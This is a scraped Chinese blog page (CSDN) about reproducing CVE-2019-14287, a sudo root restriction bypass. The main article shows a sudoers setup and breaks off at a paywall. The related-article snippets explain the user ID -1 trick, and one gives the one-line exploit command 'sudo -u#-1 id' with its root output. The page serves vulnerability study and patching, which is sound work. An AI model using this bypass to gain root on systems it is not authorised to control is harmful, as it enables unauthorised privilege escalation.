CVE-2019-14287 linux sudo root 权限绕过漏洞复现

最新推荐文章于 2022-02-26 15:38:28 发布
最新推荐文章于 2022-02-26 15:38:28 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 网络安全 软件使用 网络抓包 文章标签: 漏洞利用 sudo 权限绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42433054/article/details/102592986
版权

CVE-2019-14287 linux sudo root 权限绕过漏洞复现

1、准备工具,kali linux,或者任何版本的linux,查看sudo版本

root@kali:~# sudo -V

Sudo version 1.8.21p2

明显该版本低于1.8.28。可以进行漏洞利用。

2、创建test用户,并分配密码

root@kali:/etc# useradd test

root@kali:/etc# passwd test

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

3、切换到etc目录下面,创建test用户,编辑sudoers文件,添加test ALL=(ALL,!root) /usr/bin/vim行。

 

root@kali:~# cd /etc

root@kali:/etc# vi sudoers

 

#

# This file MUST be edited with the 'visudo' command as root.

#

# Please consider adding local content in /etc/sudoers.d/ instead of

# directly modifying this file.

#

# See the man page for details on how to write a sudoers file.

#

Defaults        env_reset

Defaults        mail_badpass

Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

 

# Host alias specification

 

# User alias specification

 

# Cmnd alias specification

 

# User privil

最低0.47元/天 解锁文章
sinfoyou
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux sudo root 权限绕过漏洞(CVE-2019-14287)
Sylon的博客
10-15 3650
0x01 逛圈子社区论坛 看到了 linux sudo root 权限绕过漏洞(CVE-2019-14287) 跟着复现下 综合来说 这个漏洞作用不大 需要以下几个前提条件 1.知道当前普通用户的密码 2.当前普通用户在souduers文件中 3.本地提权需要本地操作 估计远程ssh连接的终端会失败 0x02 此漏洞可以使受限制的用户运行root命令 1.8.28之前的...
linux sudo root 权限绕过漏洞(CVE-2019-14287)复现
YJJYXM的博客
10-31 476
漏洞描述 2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。 此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。 具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止...
CVE-2019-14287:sudo 权限绕过漏洞复现
weixin_44215027的博客
10-18 312
CVE-2019-14287:sudo 权限绕过漏洞复现 参考:Ms08067安全实验室 实验环境 kali win10 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先,检查sudo的版本: 之后创建一个新用户: useradd test passwd test 然后,切换用户为test su test 在/etc/sudoers中插入 之后就可以通过vim来进行权限绕过。...
CVE-2019-14287 sudo权限绕过漏洞复现
春日野穹
10-24 1957
0x1 引言 近日 ,sudo 被爆光一个漏洞,非授权的特权用户可以绕过限制获得特权,也就是说如果将sudo配置为允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令的话,那么攻击者将有可能通过制定用户ID -1或4294967295来以root权限执行恶意命令,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。官方的修复公告请见:https://www...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
CVE-2019-14287sudo 权限绕过漏洞复现
shy的博客
10-17 240
Linux sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。 使用权限:在 /etc/sudoers 中有出现的使用者。 1.新建用户adduser shy 2.更改密码passwd shy 3.修改/etc/sodoers/文件,由于sudoers文件只有只读权限,不能修改,所以要先赋予它写权限 4.修改/et...
CVE-2019-14287sudo权限绕过漏洞
Sulli的博客
10-18 243
实验环境 Kali 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先看一下自身Kali的sudo版本,命令:sudo -V 符合条件,接下来需要新建一个test用户,命令:useradd test passwd test 然后vi进入sudoers,命令:vi /etc/sudoers 在root ALL=(ALL:ALL) ALL下添加test用户的配置:test ALL=(AL...
CVE-2019-14287sudo 权限绕过漏洞复现过程)
大方子
10-16 686
实验环境: kali 影响范围: sudo 1.8.28 之前的所有版本 复现过程 查询下sudo的版本 sudo -V 创建用户 useradd test passwd test 编辑下sudoers文件 这里添加了 test ALL=(ALL, !root) /usr/bin/vim 这里表示 test 可以 任意主机上...
升级sudo版本至1.9.2,解决Sudo权限绕过漏洞(CVE-2019-14287)
天道酬勤
09-16 3115
1. 环境 系统:Centos7 sudo:1.8.23(使用 sudo -V) 目标sudo:1.9.2 2. 准备 查看本地sudo版本 sudo -V [root@root1 data]# sudo -V Sudo version 1.8.23 官网查看最新版本文件 https://www.sudo.ws/dist/ 3.下载最新版本到服务器并解压 wget https://www.sudo.ws/dist/sudo-1.9.2.tar.gz && tar -zx
sudo权限绕过漏洞复现CVE-2019-14287
锋刃科技的博客
06-25 848
前言 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户能够切换的用户权限 CVE-2019-14287是管理员在配置文件中用了ALL关键词后造成的。 影响版本 sudo < 1.8.28 利用条件 1、sudo -v < 1.8.28 2、知道当前用户的密码 3、当前用户存在于sudo权限列表 我们来看一下/etc/sudoers 漏洞复现 sudo -u#-...
linux 漏洞 网站,linux sudo root 权限绕过漏洞(CVE-2019-14287)
weixin_39630498的博客
05-14 226
漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止使用的...
linux 漏洞CVE-2019-14287CVE-2021-4034
任雪飘的博客
02-26 4909
大家好,我是任雪飘,一个刚接触web的菜鸡。我们今天一起复现一下linux老版本漏洞,普通用户利用sudo获得系统root权限操作系统! 现在我们重新创建一个新用户 给这个用户设置策略,就是不给他root权限,气死你 ceshi1 这个账号确实没有了root 权限的身份了 现在我们测试这个漏洞是不是存在 既然是root 权限了,那我们修改其他用户的密码吧!看下图是不是完美了 到此处CVE-2019-14287 漏洞复现完毕。 接下 下来我们就要去玩脚本...
CVE-2019-14287 sudo提权漏洞分析
独行者103的专栏
10-18 540
一、本文目的 解释sudo提权漏洞 简要说明基础概念在安全领域的重要性 二、漏洞特点。 本漏洞sudo在处理user id为-1和4294967295(232−12^{32}-1232−1)即可,为什么呢? 下面做出解释。 三、漏洞分析 根据Linux Interface Programming的解释,首先我们要知道uid的类型: struct passwd { char *pw_name; ...
CVE-2019-14287sudo 权限提升漏洞
冠霖L的博客
11-02 585
0x00 漏洞介绍 sudo本地权限提升漏洞CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令 0x01 影响版本 sudo < 1.8.28 0x02 sudo作用 sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性 0x03 ...
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
最新发布
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值